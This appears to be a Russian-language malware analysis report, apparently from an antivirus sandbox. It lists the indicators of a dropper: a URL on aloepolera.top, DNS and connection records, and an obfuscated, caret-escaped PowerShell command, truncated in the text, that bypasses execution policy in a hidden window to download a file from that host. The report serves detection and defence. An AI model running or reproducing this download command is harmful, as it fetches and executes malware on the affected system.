Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeRsheLl.eXE -ExEcUTiO^npo^liCY^ BY^pAss -NoPr^oFi^le^ -WinD^O^w^s^tyLe hIddEn^ (NeW-^o^b^J^Ect s^Ys^t^em^.nEt^.W^EbCl^IEn^T).D^OWn^LO^AdFile('http://aloepolera.top/read.ph...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "POWeRsheLl.eXE -ExEcUTiO^npo^liCY^ BY^pAss -NoPr^oFi^le^ -WinD^O^w^s^tyLe hIddEn^ (NeW-^o^b^J^Ect s^Ys^t^em^.nEt^.W^EbCl^IEn^T).D^OWn^LO^AdFile('http://aloepolera.top/read.ph...' (со скрытым окном)